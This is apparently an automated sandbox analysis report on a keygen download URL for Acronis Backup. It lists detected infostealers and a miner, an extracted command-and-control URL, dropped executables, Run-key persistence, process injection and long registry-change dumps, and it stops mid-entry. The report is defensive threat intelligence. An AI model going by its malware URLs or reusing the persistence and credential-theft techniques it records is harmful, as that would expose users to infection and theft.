Resubmissions
25-06-2021 20:11  210625-gfywseazf2  10
12-06-2021 10:48  210612-exwrsrnpvn  10
08-06-2021 06:49  210608-4y4dr7djr6  10
Analysis
max time kernel: 1798s
max time network: 1800s
platform: windows10_x64
resource: win10v20210408
submitted: 12-06-2021 10:48
Static task
static1
URLScan task
urlscan1
Sample
https://keygenit.net/keygen/keygen-Acronis-Backup-For-Vmware-9.0.10007.html
Behavioral task
behavioral1
Sample
https://keygenit.net/keygen/keygen-Acronis-Backup-For-Vmware-9.0.10007.html
Resource
win7v20210410
Behavioral task
behavioral2
Sample
https://keygenit.net/keygen/keygen-Acronis-Backup-For-Vmware-9.0.10007.html
Resource
win10v20210408
Behavioral task
behavioral3
Sample
https://keygenit.net/keygen/keygen-Acronis-Backup-For-Vmware-9.0.10007.html
Resource
macos
Behavioral task
behavioral4
Sample
https://keygenit.net/keygen/keygen-Acronis-Backup-For-Vmware-9.0.10007.html
Resource
debian9-mipsel
General
Malware Config
Extracted
raccoon
e0aa5b6d2491c503baf06d4cfeb218de1cd41474
-
url4cnc
https://tttttt.me/hbackwoods1
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
XMRig Miner Payload 1 IoCs
Processes:
resource  yara_rule
behavioral2/memory/364-282-0x0000000140000000-0x000000014070D000-memory.dmp  xmrig
-
Blocklisted process makes network request 2 IoCs
Processes:
flow  pid  process
263   364  msiexec.exe
263   364  msiexec.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 34 IoCs
Processes:
pid   process
5964  software_reporter_tool.exe
6012  software_reporter_tool.exe
6076  software_reporter_tool.exe
6096  software_reporter_tool.exe
1840  keygen-pr.exe
2320  keygen-step-1.exe
1772  keygen-step-5.exe
4260  keygen-step-6.exe
1720  keygen-step-3.exe
1452  keygen-step-4.exe
3320  Crack.exe
3256  key.exe
5080  DuAHpZZ.eXe
6104  key.exe
4548  Setup.exe
60    24C.tmp.exe
1640  ix78ESOrnjfX.exe
4708  Browzar.exe
904   1A1B.tmp.exe
5368  1AA9.tmp.exe
5560  ix78ESOrnjfX.exe
3320  GloryWSetp.exe
4688  5801742.exe
5080  2625955.exe
4512  5191048.exe
1252  WinHoster.exe
3520  2600165.exe
3696  1597176.exe
5764  note8876.exe
4320  hbggg.exe
2608  jfiag3g_gg.exe
5316  jfiag3g_gg.exe
1708  2600165.exe
1772  5191048.exe
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description  ioc  process
Key value queried  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation  Crack.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation  keygen-step-4.exe
-
Drops startup file 2 IoCs
Processes:
description  ioc  process
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NwuxwtYlIYE.exe  1AA9.tmp.exe
File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NwuxwtYlIYE.exe  1AA9.tmp.exe
-
Loads dropped DLL 15 IoCs
Processes:
pid   process
6076  software_reporter_tool.exe
6076  software_reporter_tool.exe
6076  software_reporter_tool.exe
6076  software_reporter_tool.exe
6076  software_reporter_tool.exe
6076  software_reporter_tool.exe
6076  software_reporter_tool.exe
188   rUNdlL32.eXe
1044  regsvr32.exe
1044  regsvr32.exe
60    24C.tmp.exe
60    24C.tmp.exe
60    24C.tmp.exe
60    24C.tmp.exe
60    24C.tmp.exe
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
description  ioc  process
Set value (str)  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"  2625955.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"  hbggg.exe
Key created  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  1A1B.tmp.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\waupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\waupdat3.exe"  1A1B.tmp.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
description  ioc  process
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  Browzar.exe
Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  note8876.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
268   ip-api.com
-
Drops file in System32 directory 1 IoCs
Processes:
description  ioc  process
File opened for modification  C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat  svchost.exe
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
pid   process
1044  regsvr32.exe
-
Suspicious use of SetThreadContext 9 IoCs
Processes:
description  pid  process  target process
PID 3256 set thread context of 6104  3256  key.exe  key.exe
PID 4264 set thread context of 2060  4264  svchost.exe  svchost.exe
PID 4264 set thread context of 4232  4264  svchost.exe  svchost.exe
PID 904 set thread context of 4996  904  1A1B.tmp.exe  msiexec.exe
PID 904 set thread context of 364  904  1A1B.tmp.exe  msiexec.exe
PID 1640 set thread context of 5560  1640  ix78ESOrnjfX.exe  ix78ESOrnjfX.exe
PID 3696 set thread context of 5644  3696  1597176.exe  AddInProcess32.exe
PID 3520 set thread context of 1708  3520  2600165.exe  2600165.exe
PID 4512 set thread context of 1772  4512  5191048.exe  5191048.exe
-
Drops file in Program Files directory 4 IoCs
Processes:
description  ioc  process
File opened for modification  C:\Program Files (x86)\Browzar\Browzar.exe  Setup.exe
File opened for modification  C:\Program Files (x86)\Browzar\ix78ESOrnjfX.exe  Setup.exe
File opened for modification  C:\Program Files (x86)\Browzar\Uninstall.exe  Setup.exe
File created  C:\Program Files (x86)\Browzar\Uninstall.ini  Setup.exe
-
Drops file in Windows directory 1 IoCs
Processes:
description  ioc  process
File opened for modification  C:\Windows\Debug\ESE.TXT  MicrosoftEdge.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
pid   pid_target  process       target process
4516  4708        WerFault.exe  Browzar.exe
5412  5560        WerFault.exe  ix78ESOrnjfX.exe
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description  ioc  process
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  svchost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  svchost.exe
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  svchost.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  svchost.exe
-
Delays execution with timeout.exe 1 IoCs
Processes:
pid   process
5812  timeout.exe
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description  ioc  process
Key opened  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  chrome.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  chrome.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  chrome.exe
-
Kills process with taskkill 1 IoCs
Processes:
pid   process
4860  taskkill.exe
-
Processes:
description  ioc  process
Key created  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main  MicrosoftEdgeCP.exe
Key created  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main  MicrosoftEdge.exe
Key created  \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main  browser_broker.exe
-
Modifies data under HKEY_USERS 13 IoCs
Processes:
description  ioc  process
Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix  svchost.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit  svchost.exe
Key created  \REGISTRY\USER\.DEFAULT\Software  svchost.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft  svchost.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie  svchost.exe
Key created  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  svchost.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"  svchost.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"  svchost.exe
Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"  svchost.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"  svchost.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"  svchost.exe
Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"  svchost.exe
Set value (str)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"  svchost.exe
-
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exechrome.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exerUNdlL32.eXedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead MicrosoftEdge.exe Key 
created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings chrome.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{45AC2TN3-666M-M32E-TO40-1MIP137D5TOZ}\1 = "1408" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = 
"330322255" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 1d24df8b702cd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658 = 
03000000010000001400000083da05a9886f7658be73acf0a4930c0f99b92f011400000001000000140000003656896549cb5b9b2f3cac4216504d91b933d79104000000010000001000000062455357dd57cb80c32ab295743cccc00f00000001000000200000006811c6215f18c75fdbe32cf56bd66248562a7fa3ba459cfee338745061e583941900000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d705c000000010000000400000000100000180000000100000010000000bb048f1838395f6fc3a1f3d2b7e976542000000001000000dc060000308206d8308204c0a003020102020a613fb718000000000004300d06092a864886f70d01010b0500308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f726974792032303131301e170d3131313031383232353531395a170d3236313031383233303531395a307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f66742053656375726520536572766572204341203230313130820222300d06092a864886f70d01010105000382020f003082020a0282020100d00bc0a4a81981e236e5e2aae5f3b2155875beb4e549f1e084f9bb0d64ef85c18155b8f3e7f16d40553dce8b6ad18493f5757c5ba4d47410ca32f323d3aeeecf9e0458c2d947cbd17c004148711b01671718afc6fe73037ee4ef439cef01712a1f81264377985457739d552bf09e8e7d060eac1b54f326f7f82308228b9e061d3738fd72d2cae563c19a5a7db26db352a96ee9aeb5fc8b36f99efaf61c581b9756a511e5b752dbbbe9f054bfb4ff2c6cb85d26cea00ad7df93ed7fddacf12c731ad9193755badd22788ea1d49b09f807223171b094aee0b0e726445790819715ce61ec65e24bf185521632f8b578aa7ecd4dec8321a4a89bbe9a6a04e0a31ccd56186cfd6b2f423ee237f272abd07873727bdeec0058e52130a3083a99ef9fc3f77a169665b5c381aff4397049aff6a9f66a0038f9b40819e01a35a55676225f6af269ae3ead58464db854f68941441e72b1bc122753d2c1ffb2cd50981eb5f4bbb6c28239d9ac1bf23b27846ab0c6260bd73a10e7b3db7cd356ac534c0bfa3b313774d8592bf9007919067bfd1c1d42d4410d2f050ed56b
4923ffcfcdf87a82cfda3c2ddfe8d8120418ba1e8877b8981f1007bbc8057e0b09bf6bdde34e5bb0f9c784a63bca4c9f5b6229f7c7a2a89588702ce5c13f3c52234f409ac33185832fbf29f11d508f219607ceeff280c2447d9b62ef2fc37789ab454d533e0279d30203010001a382014b30820147301006092b06010401823715010403020100301d0603551d0e041604143656896549cb5b9b2f3cac4216504d91b933d791301906092b0601040182371402040c1e0a00530075006200430041300b0603551d0f040403020186300f0603551d130101ff040530030101ff301f0603551d23041830168014722d3a02319043b914054ee1eaa7c731d1238934305a0603551d1f04533051304fa04da04b8649687474703a2f2f63726c2e6d6963726f736f66742e636f6d2f706b692f63726c2f70726f64756374732f4d6963526f6f436572417574323031315f323031315f30335f32322e63726c305e06082b0601050507010104523050304e06082b060105050730028642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b692f63657274732f4d6963526f6f436572417574323031315f323031315f30335f32322e637274300d06092a864886f70d01010b0500038202010041c861c1f55b9e3e9131f1b0c6bf0901b49db69074d709dba62e0d9fc8e7763446af0760894c81b33cd5f4123575c273a5f54d848ccba45dafbf92f617085742957265057679adeed1bab82e54a35107ac68eb210ce32581c2cd2af2c3ffcfc2bd49189ac7f084c5f914bc6b95e596efb342d253d54aa012c4ae12765309560e9df7d3a6498850f28a2c9720a2be4e78ef0565b74ba11688de31c70842247ca47b9e9dbc60005e6297e393fca7fe5b7b25dfe4537f4bbee63ef0db0179421c6e856c7db64430fba5379293b2a5ee20ad3f53d5c9f4286b57c1f81d6ab7562ab627811ca62d9fe7f4d0318397a82ab6acbe1b41f5e4895f56fbda5ad35e7d5594107e5357f44a3d402ac8bd679f84e110eefdda6b158249fc461dff4506749c4214edc539d3b3cd0b832790435192f24482ae6e9a1517b219fac7456c98017bbf37a9b088a492bc3838e01de47c97981a2e5fef3865b7352fbd7f4f21fac48cd26f06f94935eadf200f25aaea60ab2c1f4b89fcb7fa5c54904b3ea2284f6ce45265c1fd901c8582886ee9a655dd21287945b014e50acce65fc4bbdb6134699fac2638f7c1294108152e4ca0f7f90c3ede5fab08092d83acac348362f4c949428925b56eb247c5b339a0b1201b2cb18e046fa530491cd046e9405bf4ad6ebadb824a87124a80094ddbdf76b9055b1be0bb20705f0025c7d30efa16ad7b229e7108 MicrosoftEdge.exe Key created 
\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{8BA130A1-B374-43E2-BA97-B3B3A47764F4} = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 440214bb8d5fd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local 
